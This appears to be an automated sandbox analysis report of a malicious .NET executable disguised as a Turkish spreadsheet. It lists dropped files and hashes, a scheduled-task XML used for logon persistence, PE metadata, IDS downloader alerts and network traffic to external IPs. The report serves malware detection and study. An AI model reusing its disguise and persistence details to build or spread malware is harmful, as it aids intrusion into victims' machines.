SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyybqu4b.t2p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2b05ib0.lfi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njybn5xo.zbl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyfheknh.0ir.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3e5u04e.xci.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1B98.tmp

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.105968186799007
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtDxvn:cgergYrFdOFzOzN33ODOiDdKrsuT9v
MD5:	EEAD6987DD134DF5CC6704FEBAB762DB
SHA1:	3851229E74A436EBFCE80177C88BA7613C6587E4
SHA-256:	17D2B909479E66F722E119459297807FACD8BBAD050B2F743E8A166D3065C8D7
SHA-512:	CDFA9E6D7ECA6D4B8744B74B25F57D7C3616FB633FEB250AF4F2F57B30028902E768EEDCE45C3B4E4702C93224A019FDFFD76BD3154D2E9C8D0E19F29FCDF21E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.105968186799007
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtDxvn:cgergYrFdOFzOzN33ODOiDdKrsuT9v
MD5:	EEAD6987DD134DF5CC6704FEBAB762DB
SHA1:	3851229E74A436EBFCE80177C88BA7613C6587E4
SHA-256:	17D2B909479E66F722E119459297807FACD8BBAD050B2F743E8A166D3065C8D7
SHA-512:	CDFA9E6D7ECA6D4B8744B74B25F57D7C3616FB633FEB250AF4F2F57B30028902E768EEDCE45C3B4E4702C93224A019FDFFD76BD3154D2E9C8D0E19F29FCDF21E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	681472
Entropy (8bit):	7.869185652608418
Encrypted:	false
SSDEEP:	12288:BqdtTJIgiA91z0+E0rz2CueMqVIHdtuhvC3Dq1Lnz:BngiG0aCCDMmatulC3Dq1L
MD5:	2F7386B9D0023122E2499BC02FCA0E5A
SHA1:	2D19FBF3AFF8726F81EE3CDD27CE338CF36DB816
SHA-256:	A0A21DD376537C79AC0BE99488EEF94CF21475CD98DE2C6CEE0094A8FD52CDC0
SHA-512:	2FD928AA00288B0D45516FB91185ACA2DC93EF4BFA5ADE7297DE9CBD11C7AD652FB5BC9E0ABA848C9C69B6B3139AAF9165BAD3C1210C1ADC793D9E94BC42CFAD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(................0..\.........."{... ........@.. ....................................@..................................z..O...................................hd..p............................................ ............... ..H............text...([... ...\.................. ..`.rsrc................^..............@..@.reloc...............d..............@..B.................{......H........]...3......#....................................................{...."..}........0..f...........3...%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}.....(........0.._........s....}.....s....}......}.....(.......(......{....(.......{....(......{....(.......{....(.......0............{....r...po.......o.....+d..(.......{......3...%..oB....%.r...p.%..oF......(.....%.r...p.%..oD......(.....%.(.....(....o........(....-...........o ...

C:\Users\user\AppData\Roaming\OnCgVRIhY.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.869185652608418
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File size:	681'472 bytes
MD5:	2f7386b9d0023122e2499bc02fca0e5a
SHA1:	2d19fbf3aff8726f81ee3cdd27ce338cf36db816
SHA256:	a0a21dd376537c79ac0be99488eef94cf21475cd98de2c6cee0094a8fd52cdc0
SHA512:	2fd928aa00288b0d45516fb91185aca2dc93ef4bfa5ade7297de9cbd11c7ad652fb5bc9e0aba848c9c69b6b3139aaf9165bad3c1210c1adc793d9e94bc42cfad
SSDEEP:	12288:BqdtTJIgiA91z0+E0rz2CueMqVIHdtuhvC3Dq1Lnz:BngiG0aCCDMmatulC3Dq1L
TLSH:	23E4124C105ADE13E0AB4FF40550D2B593B99EE9B926D3039FEB7DDFB86A7401881782
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(................0..\.........."{... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4a7b22
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xCCC428E2 [Fri Nov 11 15:53:06 2078 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa7acd	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x5bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xaa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa6468	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa5b28	0xa5c00	958290373b5fcde9f9afe3b39f008cb5	False	0.9393441270739065	data	7.876320634806518	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x5bc	0x600	a8b1520dfd2d337517ac3ff9a32d79c5	False	0.4231770833333333	data	4.1128339547857475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xaa000	0xc	0x200	b0607fac83c115422fc31c055fbfae26	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa8090	0x32c	data			0.42980295566502463
RT_MANIFEST	0xa83cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T09:00:18.715898+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	132.226.8.169	80	TCP
2024-09-26T09:00:19.731471+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	132.226.8.169	80	TCP
2024-09-26T09:00:20.311048+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49716	188.114.96.3	443	TCP
2024-09-26T09:00:21.309584+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49718	132.226.8.169	80	TCP
2024-09-26T09:00:23.934679+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49721	132.226.8.169	80	TCP
2024-09-26T09:00:28.659896+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49726	188.114.96.3	443	TCP
2024-09-26T09:00:31.700266+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49728	132.226.8.169	80	TCP
2024-09-26T09:00:34.794104+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49732	132.226.8.169	80	TCP
2024-09-26T09:00:35.797526+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49736	188.114.96.3	443	TCP
2024-09-26T09:00:37.262765+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49737	132.226.8.169	80	TCP
2024-09-26T09:00:39.522152+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49740	132.226.8.169	80	TCP
2024-09-26T09:00:41.153367+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49742	132.226.8.169	80	TCP
2024-09-26T09:00:43.453085+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49744	132.226.8.169	80	TCP
2024-09-26T09:00:44.005224+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49745	188.114.96.3	443	TCP
2024-09-26T09:00:44.950287+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49746	132.226.8.169	80	TCP
2024-09-26T09:00:45.502345+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49747	188.114.96.3	443	TCP
2024-09-26T09:00:46.922610+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49748	132.226.8.169	80	TCP
2024-09-26T09:00:47.551763+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49749	188.114.96.3	443	TCP
2024-09-26T09:00:48.418997+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49750	132.226.8.169	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:00:04.495780945 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:04.503082037 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:04.503149033 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:04.503443956 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:04.510286093 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:07.916013956 CEST	49709	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:07.921080112 CEST	80	49709	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:07.921139002 CEST	49709	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:07.921547890 CEST	49709	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:07.927691936 CEST	80	49709	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:18.381717920 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:18.389307022 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:18.394170046 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:18.672473907 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:18.715898037 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:18.723203897 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:18.723244905 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:18.723356009 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:18.729096889 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:18.729115009 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.217724085 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.217804909 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.221734047 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.221750975 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.222222090 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.262711048 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.278126001 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.319442034 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.389566898 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.389693975 CEST	443	49713	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.389760017 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.398749113 CEST	49713	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.407418013 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:19.412293911 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:19.685151100 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:19.690104008 CEST	49716	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.690151930 CEST	443	49716	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.690267086 CEST	49716	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.690716982 CEST	49716	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:19.690730095 CEST	443	49716	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:19.731471062 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:20.162926912 CEST	443	49716	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:20.187016964 CEST	49716	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:20.187043905 CEST	443	49716	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:20.311105013 CEST	443	49716	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:20.311357021 CEST	443	49716	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:20.311427116 CEST	49716	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:20.311834097 CEST	49716	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:20.317507029 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:20.318963051 CEST	49718	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:20.323035955 CEST	80	49706	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:20.323091984 CEST	49706	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:20.323821068 CEST	80	49718	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:20.323915958 CEST	49718	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:20.324029922 CEST	49718	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:20.329128027 CEST	80	49718	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:21.264353037 CEST	80	49718	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:21.265898943 CEST	49720	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:21.265948057 CEST	443	49720	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:21.266151905 CEST	49720	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:21.266472101 CEST	49720	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:21.266486883 CEST	443	49720	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:21.309583902 CEST	49718	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:21.751183033 CEST	443	49720	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:21.760164976 CEST	49720	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:21.760189056 CEST	443	49720	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:21.902393103 CEST	443	49720	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:21.902510881 CEST	443	49720	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:21.902571917 CEST	49720	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:21.903122902 CEST	49720	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:21.906920910 CEST	49718	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:21.908056974 CEST	49721	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:21.912134886 CEST	80	49718	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:21.912197113 CEST	49718	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:21.912959099 CEST	80	49721	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:21.913041115 CEST	49721	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:21.913141966 CEST	49721	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:21.917948961 CEST	80	49721	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:23.893579960 CEST	80	49721	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:23.895209074 CEST	49722	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:23.895303965 CEST	443	49722	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:23.895457029 CEST	49722	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:23.895762920 CEST	49722	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:23.895797968 CEST	443	49722	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:23.934679031 CEST	49721	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:24.357472897 CEST	443	49722	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:24.359256029 CEST	49722	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:24.359285116 CEST	443	49722	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:24.506100893 CEST	443	49722	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:24.506412983 CEST	443	49722	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:24.506611109 CEST	49722	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:24.507024050 CEST	49722	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:24.511181116 CEST	49723	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:24.516127110 CEST	80	49723	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:24.516222000 CEST	49723	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:24.516272068 CEST	49723	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:24.521147013 CEST	80	49723	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:26.591084957 CEST	80	49723	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:26.592547894 CEST	49724	443	192.168.2.5	188.114.96.3
